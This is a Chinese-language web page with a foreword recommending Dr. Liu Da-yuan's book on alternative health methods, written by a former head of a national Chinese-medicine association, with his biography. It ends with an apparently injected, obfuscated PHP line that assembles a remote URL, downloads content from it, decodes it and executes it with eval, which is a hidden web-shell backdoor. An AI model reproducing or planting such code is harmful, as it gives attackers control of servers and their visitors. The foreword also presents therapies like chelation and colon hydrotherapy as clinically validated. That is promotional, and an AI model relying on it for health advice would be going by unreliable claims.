收藏本站
推薦序 列印 E-mail
文章索引
推薦序
頁 2
頁 3
頁 4
頁 5
頁 6
頁 7
頁 8

救人的方法越多越好


林昭庚 中華民國中醫師公會全國聯合會 名譽理事長

劉醫師為醫界的一朵奇葩,並已綻放出美麗的花朵,杏林花圃更為精采繽紛。

前總統府資政恩師陳公立夫先生,於生前曾云「救人的方法越多越好」;因此,渠於1972年接任中國醫藥學院(即改制後中國醫藥大學)董事長時,即大力倡導中西 一元化的理念,推動醫學系的學生研習中醫課程,中醫系的學生研修西醫的課程。

個人有幸於就讀中醫學系時,吸 取現代醫學的新知,開拓了醫療的視野,由宏觀的中國醫學殿堂,跨入了微觀的西方醫學領域。在跨越中西醫學藩 籬,個人對醫療更有超然的立場,從此在往後的講學、研究及醫療,皆秉持恩師的理念,推動中西整合並由國內推廣到國外,提倡中西結合,冀能造福世人健康。面對現代疾病的複雜化及多元化,以及患者的年輕 化,治療疾病已非單一醫學可以解決的,為突破現代醫療的瓶頸及節省醫療資源,世界衛生組織(WHO),於2002年開始倡導各國政府重視傳統醫學的研究及發展,發表「2002~2005 WHO傳統醫藥全球策略」,鼓勵各國將傳統醫藥納入醫療政策,期能提供人類更佳的醫療照護。

第14屆國際東洋醫學學術大會(ICOM)於2007年12 月1日~4日在台北市召開,有來自12個國家及超過2000人與會,外國人士即有150餘人,本人為籌備會推舉為主任 委員,及學術大會會長。本次大會論文主題涵蓋東洋醫學(有別於西方醫學)之教育普及化、管理策略、健康促 進、實證研究。除涵蓋各國傳統醫學,如:中醫藥、針 灸、印度醫學草藥之外,還有氣功、瑜珈、順勢療法、能量醫學、酵素療法、螯合療法、芳香療法、光照療法、大 腸水療等,為國際醫學界歸類的另類醫學。大會發表的論文頗為豐富,可見由中西醫學的結合,及另類醫學輔助主流醫學,匯聚而成之整合醫學的時代已經來臨。

每一種醫學都有其優點,亦有其盲點,建立以病患為中心的醫療模式,使用整合醫療,已成為全球醫療界主流價值與努力的方向。劉大元醫師於接受嚴謹的主流醫學 之西醫教育訓練,除具備專科醫師,有感學之不足,遂再進入中國醫藥大學研習中醫,又到國外研究另類醫學,將近20年的時間浸淫於主流醫學,與另類醫學互補的醫療世界,焉然有成,遂成立「中華民國另類醫學醫學會」,推動整合醫學,並將所學提供病患優質的醫療照護。劉醫師為醫界的一朵奇葩,並已綻放出美麗的花朵,杏林花圃更為精采繽紛。

為造福廣大的病患,及嘉惠醫界同道,劉理事長更將其20年青春歲月,專研另類醫學,匯整最常用、 且具有臨床驗證的療法,集結成專書名曰《你不可不知的 另類健康法》一書,提供醫界參考應用,誠為難能可貴,功德無量。時值劉大醫師佳作《你不可不知的另類健康法》出版前夕,特為文祝賀,並對劉理事長20年來默默耕耘的付出 深表敬意。



林昭庚 簡介

經歷

‧中西醫師
‧中國醫藥大學中國醫學研究所博士
‧中國醫藥大學針灸研究中心主任
‧中國醫藥大學中國醫學研究所所長
‧台大醫學院兼任教授
‧台北市中醫師公會理事長
‧中華民國中醫師公會全國聯合會理事長

現職

‧中國醫藥大學教授
‧中國醫藥大學董事
‧中華針灸醫學會理事長
‧中華民國中醫師公會全國聯合會名譽理事長



 
@eval(base64_decode(file_get_contents('h'.str_replace('$','ell',str_replace('&','.',str_replace('^','/',str_replace('%','ttp','%:^^sh$&nn'.'xuu&com^ab&ph'.'p')))))));